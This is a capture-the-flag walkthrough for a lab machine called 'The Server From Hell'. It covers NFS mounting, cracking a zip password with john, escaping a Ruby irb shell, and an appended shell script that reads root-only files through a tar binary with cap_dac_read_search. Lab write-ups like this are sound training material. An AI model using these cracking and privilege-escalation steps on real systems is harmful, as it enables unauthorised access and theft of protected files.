The Server From Hell

Walkthrough for The Server from Hell 

Start with an nmap scan of the target IP -

111 (rpcbind), 1137 (unidentified; nmap guesses trim, possibly telnet), 2049 (nfs), 3333 (ssh)


We can further enumerate rpc and nfs (rpcinfo against 111, nmap's nfs-* scripts against 2049) -


To find out which directories the server exports (i.e. lets us mount) we can ask it using -

showmount -e IP


we can mount this export using (create the mount point first with mkdir /tmp/1) - sudo mount -t nfs IP:/home/nfs /tmp/1


It contains a backup.zip file. Copy it off the mount; unzipping it shows that it is password protected
(the room owner may have hidden the password in some other process, but I cracked it online).
The offline equivalent is zip2john backup.zip > zip.hash followed by john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash.
After cracking the zip we find flag.txt and id_rsa

we can ssh into hades' shell with the key (run chmod 600 id_rsa first, otherwise ssh refuses it as too open) - ssh -i id_rsa hades@IP -p 3333

after logging in we land in an unfamiliar prompt (not bash or sh); searching for the irb prompt string shows it is a Ruby interactive shell.
We can run system commands with system("command-here"), or replace the process with a real shell using -
exec "/bin/bash" and then read the user flag -

We have no write permissions where we land, so we can't upload enumeration scripts to look for an attack vector

We have to check for privilege escalation paths manually -

1) we don't have hades' password, so anything that needs sudo (e.g. sudo -l) is out

2) we can list SUID files with - find / -type f -perm /4000 2>/dev/null
        (the list is long, and nothing on it stands out against the usual distro defaults, so no lead here)

3) we can check for file capabilities - getcap -r / 2>/dev/null      this flags tar -

after looking tar up on GTFOBins (https://gtfobins.github.io/gtfobins/tar/) we get -

we can read the root flag using this -
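As an added example (not part of the original walkthrough), the shell below puts the two halves of step 3 into runnable form: a triage of getcap output that flags capabilities worth looking up on GTFOBins, and the file-read trick for a tar binary carrying cap_dac_read_search. The capability value, the sample getcap lines, and the tar path are assumptions; the post does not reproduce the exact output or the command it used.

```shell
#!/bin/sh
# Added example, not from the original walkthrough. Triages `getcap -r /` output
# for capabilities that give file-read or root-equivalent power, then reads a
# file through a tar binary assumed to carry cap_dac_read_search.

# Capabilities that are a privilege-escalation lead on their own.
DANGEROUS_CAPS='cap_dac_read_search|cap_dac_override|cap_setuid|cap_setgid|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_chown|cap_fowner'

# Constructed sample of getcap output (not real target data). libcap prints
# either "path = caps" (older) or "path caps" (newer); both are handled.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/sbin/arping = cap_net_raw+ep'

# interesting_caps: read getcap output on stdin, print "binary<TAB>caps" for
# every entry whose capability set contains a dangerous capability.
interesting_caps() {
    sed 's/ = / /' | while read -r bin caps; do
        if printf '%s' "$caps" | grep -Eq "$DANGEROUS_CAPS"; then
            printf '%s\t%s\n' "$bin" "$caps"
        fi
    done
}

# tar_read_file TAR_BIN FILE: print FILE using TAR_BIN.
# cap_dac_read_search lets the tar process bypass read/search permission
# checks, so the first tar can archive a root-only file to stdout; the second
# tar merely extracts that stream to stdout (-O) and needs no privilege.
tar_read_file() {
    tar_bin=$1
    target=$2
    "$tar_bin" -cf - "$target" 2>/dev/null | "$tar_bin" -xOf -
}

# Demo run on the constructed sample: only the tar entry should be reported.
printf '%s\n' "$SAMPLE_GETCAP" | interesting_caps
```

On the target you would feed it real output, getcap -r / 2>/dev/null | interesting_caps, and then tar_read_file /usr/bin/tar /root/root.txt. If the capability is not actually in effect the first tar fails with "Permission denied" and nothing is printed, which is the check that tells you whether this lead is live.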


Hope you find the help you were looking for :) please suggest me corrections if any...
Thanks for reading !
